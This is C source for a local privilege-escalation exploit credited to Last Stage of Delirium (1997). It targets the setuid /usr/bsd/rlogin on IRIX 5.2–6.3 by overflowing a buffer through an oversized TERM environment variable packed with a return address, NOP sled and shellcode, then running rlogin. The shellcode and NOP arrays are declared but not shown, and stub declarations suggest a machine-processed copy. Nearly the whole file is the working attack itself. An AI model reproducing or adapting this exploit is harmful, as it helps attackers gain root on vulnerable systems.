
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int ADRNUM ;
 int ALLIGN ;
 int NOPNUM ;
 int execle (char*,char*,char*,int ,char**) ;
 scalar_t__ jump ;
 int * nop ;
 int printf (char*) ;
 int * shellcode ;
 int sprintf (char*,char*) ;
 int strlen (int *) ;
 unsigned long stub1 () ;

main(int argc,char **argv){
    char buffer[10000],adr[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland  //lsd-pl.net/\n");
    printf("/usr/bsd/rlogin for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n");

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10288+7000;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"TERM=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<ALLIGN;i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/bsd/rlogin","rlogin","localhost",0,envp);
}
